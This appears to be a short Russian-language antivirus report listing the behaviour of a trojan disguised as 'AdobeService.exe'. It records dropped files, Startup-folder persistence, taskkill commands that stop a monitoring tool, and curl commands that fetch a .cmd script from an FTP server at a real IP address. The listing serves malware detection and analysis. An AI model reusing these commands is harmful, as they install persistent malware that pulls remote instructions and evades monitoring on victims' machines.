Техническая информация
- %TEMP%\1.tmp\AdobeService.exe
- '%HOMEPATH%\Controll\Curl.exe' ftp://Co#######0000@109.173.96.55:20/Controll/Anonimus_20106/Anonimus_20106.cmd -o "%HOMEPATH%\Controll\temp\Anonimus_20106.cmd"
- '%HOMEPATH%\Controll\reservices.exe' 5
- '%HOMEPATH%\Start Menu\Programs\Startup\AdobeService.exe'
- '%HOMEPATH%\Controll\Curl.exe' --ftp-create-dirs ftp://Co#######0000@109.173.96.55:20/Controll/Anonimus_20106/
- '<SYSTEM32>\taskkill.exe' /f /im "Curl.exe"
- '<SYSTEM32>\taskkill.exe' /f /im "reservices.exe"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2.tmp\AdobeService.bat" "
- '<SYSTEM32>\taskkill.exe' /f /im "AdobeService.exe"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\setup.bat" "
- '<SYSTEM32>\reg.exe' query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup
- '<SYSTEM32>\taskkill.exe' /f /im "AnVir.exe"
- %TEMP%\2.tmp\AdobeService.bat
- %HOMEPATH%\Controll\NameSet.ini
- %HOMEPATH%\Controll\reset_work
- %TEMP%\1.tmp\reservices.exe
- %TEMP%\1.tmp\setup.bat
- %TEMP%\1.tmp\AdobeService.exe
- %TEMP%\1.tmp\curl.exe
- %HOMEPATH%\Controll\reset_work
- %TEMP%\1.tmp\setup.bat
- %TEMP%\1.tmp\reservices.exe в %HOMEPATH%\Controll\reservices.exe
- %TEMP%\1.tmp\curl.exe в %HOMEPATH%\Controll\Curl.exe
- '10#.#73.96.55':20
- ClassName: '(null)' WindowName: '(null)'